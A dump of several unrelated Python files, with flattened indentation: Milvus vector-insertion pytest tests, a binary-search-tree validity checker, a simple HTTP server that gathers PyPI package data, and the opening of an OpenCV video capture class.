target: test add vectors without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
with pytest.raises(Exception) as e:
status, ids = dis_connect.add_vectors(collection, vectors)
def test_add_collection_not_existed(self, connect):
'''
target: test add vectors in collection, which not existed before
method: add vectors to a collection that does not exist, check the status
expected: status not ok
'''
nq = 5
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(gen_unique_str("not_exist_collection"), vector)
assert not status.OK()
assert not ids
def test_add_vector_dim_not_matched(self, connect, collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
# TODO: enable
# @pytest.mark.repeat(10)
@pytest.mark.timeout(ADD_TIMEOUT)
def _test_add_vector_with_multiprocessing(self, args):
'''
target: test add vectors, with multi processes
method: multiple processes add vectors concurrently
expected: status ok and result length is equal to the length of added vectors
'''
collection = gen_unique_str()
uri = "tcp://%s:%s" % (args["ip"], args["port"])
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
milvus.create_collection(param)
vector = gen_single_vector(dim)
process_num = 4
loop_num = 5
processes = []
def add():
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
i = 0
while i < loop_num:
status, ids = milvus.add_vectors(collection, vector)
i = i + 1
milvus.disconnect()
for i in range(process_num):
p = Process(target=add, args=())
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
time.sleep(2)
status, count = milvus.count_collection(collection)
assert count == process_num * loop_num
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_add_rows_count_multi_threading(self, args):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and add vectors in it(idmap),
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
collection = gen_unique_str()
uri = "tcp://%s:%s" % (args["ip"], args["port"])
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
milvus.create_collection(param)
vectors = gen_vectors(nb, dim)
def add(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
status, result = milvus.add_vectors(collection, records=vectors)
assert status.OK()
status = milvus.flush([collection])
assert status.OK()
for i in range(thread_num):
x = threading.Thread(target=add, args=(i, ))
threads.append(x)
x.start()
for th in threads:
th.join()
status, res = milvus.count_collection(collection)
assert res == thread_num * nb
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of L2
method: create 20 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
for j in range(5):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddIP:
"""
******************************************************************
The following cases are used to test `add_vectors / index / search / delete` mixed function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, ip_collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
param = {'collection_name': ip_collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, ip_collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert assert_has_collection(connect, ip_collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, ip_collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': 'test_add_vector_delete_another_collection',
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, ip_collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index after adding vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index after adding vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
if index_type == IndexType.IVF_PQ:
pytest.skip("Skip some PQ cases")
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, ip_collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
connect.flush([ip_collection])
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 a while after searching collection_2
method: search collection, sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
connect.flush([ip_collection])
assert len(ids) == nq
# check search result
status, result = connect.search_vectors(ip_collection, top_k, vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, ip_collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for i in range(nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, ip_collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.level(2)
def test_add_vectors_without_connect(self, dis_connect, ip_collection):
'''
target: test add vectors without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
with pytest.raises(Exception) as e:
status, ids = dis_connect.add_vectors(ip_collection, vectors)
def test_add_vector_dim_not_matched(self, connect, ip_collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, ip_collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, ip_collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of IP
method: create 20 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
for j in range(10):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddAdvance:
@pytest.fixture(
scope="function",
params=[
1,
10,
100,
1000,
pytest.param(5000 - 1, marks=pytest.mark.xfail),
pytest.param(5000, marks=pytest.mark.xfail),
pytest.param(5000 + 1, marks=pytest.mark.xfail),
],
)
def insert_count(self, request):
yield request.param
def test_insert_much(self, connect, collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_ip(self, connect, ip_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(ip_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_jaccard(self, connect, jac_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_hamming(self, connect, ham_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(ham_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_tanimoto(self, connect, tanimoto_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(tanimoto_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
class TestNameInvalid(object):
"""
Test adding vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors)
assert not status.OK()
@pytest.mark.level(2)
def test_add_vectors_with_invalid_tag_name(self, connect, get_collection_name, get_tag_name):
collection_name = get_collection_name
tag_name = get_tag_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors, partition_tag=tag_name)
assert not status.OK()
class TestAddCollectionVectorsInvalid(object):
"""
Test adding vectors with invalid vectors
"""
single_vector = gen_single_vector(dim)
vectors = gen_vectors(2, dim)
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def gen_vector(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vector_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_single_vector = copy.deepcopy(self.single_vector)
tmp_single_vector[0][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_single_vector)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_jaccard(self, connect, jac_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(jac_collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_hamming(self, connect, ham_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(ham_collection, tmp_vectors)
|
is_bst_hard.py
|
# python3
"""
You are given a binary tree with integers as its keys.
You need to test whether it is a correct binary search tree.
For example, the binary tree shown below is considered INCORRECT
    2
   / \
  2   2
but the binary tree
    2
   / \
  1   2
is considered CORRECT: keys equal to the root belong in the right subtree.
A recursive in-order DFS traversal is used.
"""
import sys
import threading
sys.setrecursionlimit(10 ** 7) # max depth of recursion
threading.stack_size(2 ** 25) # new thread will get stack of such size
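# Worked example of the expected stdin format (derived from main() below):
# the first line is the number of vertices n, followed by n lines of
# "key left_index right_index", where -1 means the child is absent and
# vertex 0 is the root. The CORRECT tree above would be entered as:
#   3
#   2 1 2
#   1 -1 -1
#   2 -1 -1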
def is_key_gr_or_eq_root(key, root_key):
return key >= root_key
def is_key_smaller_root(key, root_key):
return key < root_key
def walk_decorator(tree, fail_condition):
root_key = tree[0][0]
min_key_stack = []
def walk(i):
stack = []
while i != -1:
stack.append(i)
min_key = tree[i][0]
i = tree[i][1]
l_ch_key = float("-inf")
if stack:
min_key_stack.append(min_key)
while stack:
i = stack.pop()
key = tree[i][0]
if key <= l_ch_key or fail_condition(key, root_key):
return False
l_ch_key = key
r_ch_i = tree[i][2]
if r_ch_i != -1:
r_ch_key = tree[r_ch_i][0]
if key > r_ch_key or not walk(r_ch_i):
return False
if min_key_stack.pop() < key:
return False
return True
return walk
def is_bst(tree):
is_left_bst = walk_decorator(tree, is_key_gr_or_eq_root)(tree[0][1])
if not is_left_bst:
return False
is_right_bst = walk_decorator(tree, is_key_smaller_root)(tree[0][2])
return is_left_bst and is_right_bst
def main():
n = int(next(sys.stdin))
tree = [tuple(map(int, line.split())) for line in sys.stdin]
if n == 0 or is_bst(tree):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
|
sync_server.py
|
#!/usr/bin/env python3
# coding: utf-8
import multiprocessing
import os
import sys
import time
from pypi_top_packages_async import get_from_pypi
from http.server import SimpleHTTPRequestHandler as Handler
from http.server import HTTPServer as Server
start = time.time()
MAX_PKGS = 200
# Read port selected by the cloud for our application
PORT = int(os.getenv('PORT', 8000))
# Change current directory to avoid exposure of control files
try:
os.chdir('static_parent_dir')
except FileNotFoundError:
pass
def create_html_from_pypi(max_pkgs=MAX_PKGS):
p = multiprocessing.current_process()
print('Starting process:', p.name, p.pid)
sys.stdout.flush()
try:
max_pkgs = int(sys.argv[1])
except (IndexError, ValueError):
max_pkgs = MAX_PKGS
print(max_pkgs)
packages = get_from_pypi(max_pkgs)
print(time.time() - start, 'seconds,', len(packages), 'packages.')
# with open('index.html', 'w') as out_file:
# out_file.write(create_html(packages)) # read_packages(max_pkgs)))
print(time.time() - start, 'seconds')
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
return 42
# start a separate process to gather data from PyPI in the background
multiprocessing.Process(name='PyPI Scan', target=create_html_from_pypi).start()
# while the main process runs a webserver
httpd = Server(("", PORT), Handler)
if PORT == 8000: # we are running the server on localhost
import webbrowser
webbrowser.open('http://localhost:8000')
try:
print("Start serving at port %i" % PORT)
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
URI to input stream. It could be image sequence (e.g. '%06d.jpg'), video file (e.g. 'file.mp4'),
MIPI CSI camera (e.g. 'csi://0'), USB/V4L2 camera (e.g. '/dev/video0'),
RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
or HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>')
output_uri : str, optional
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
For live sources, a larger buffer drops fewer frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""Start capturing from file or device."""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""Stop capturing from file or device."""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""Reads the next video frame.
Returns
-------
ndarray
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""Writes the next video frame."""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""Cleans up input and output sources."""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
